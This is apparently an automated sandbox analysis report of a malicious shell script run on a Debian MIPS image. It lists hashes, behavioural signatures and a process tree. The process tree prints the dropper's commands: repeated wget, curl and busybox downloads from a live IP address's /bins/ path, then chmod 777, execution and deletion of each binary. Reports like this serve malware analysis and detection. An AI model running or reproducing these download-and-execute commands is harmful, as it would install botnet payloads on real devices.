Analysis
-
max time kernel
56s -
max time network
58s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
10-11-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
-
Size
10KB
-
MD5
0aab00d4e7063c05a4a2623bcf37a039
-
SHA1
f155f96de5ba4dba0e81f04fc0b9739488955248
-
SHA256
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574
-
SHA512
e4d19d1c05c96c81636e67f4a78b9021ac9ee306b17c30fbdf68f0f3bc52d9a0b7a2d1fb6706b5a507f7b1bbca57e1a2c5875c4dbe57c90cb180aeeafc800b0c
-
SSDEEP
192:U4GT9Uq+r7f9jOytEsjARO9Uq+r7fOOytEsOQ:U4GmJ/ARHfQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Processes:
curl: File opened for reading /proc/sys/crypto/fips_enabled
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:717
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:739
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:741 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:742
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:743
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:745
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:746 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:747 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:749
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:751
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:766
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:771 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:773 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:776
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:777
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:797
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:802 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:803 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:805
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:806
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:808
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:809 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:810 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:811
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:812
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:814
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:815 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:816 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:819
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:820
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:836
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:842 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:843 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:847
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:848
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:856
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:857 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:858 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:859
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:860
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:862
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:863 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:864 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:865
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:866
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:868
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:869 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:870 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:871
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:872
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:874
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:875 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:876 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:877
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:878
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:883
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:884 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:885 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:886
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:887
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:889
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:890 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:891 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:892
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:893
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:895
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:896 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:897 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:898
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:899
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:901
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:902 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:903 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:904
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:905
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:907
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:908 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:909 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:910
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:911
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:913
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:914 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:915 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:916
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:917
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:919
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:920 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:921 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:922
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:923
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:925
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:926 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:927 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:928
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:929
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:931
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:932 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:933 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:934
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:935
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:937
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:938 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:939 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:940
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:941
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:943
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:944 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:945 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:946
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:947
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:949
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:950 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:951 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:952
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:953
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:955
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:956 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:957 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:958
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:959
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:961
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:962 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:963 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:964
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:965
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:967
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:968 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:969 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:970
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:971
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:973
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:974 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:975 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:976
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:977
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:979
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:980 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:981 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:982
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97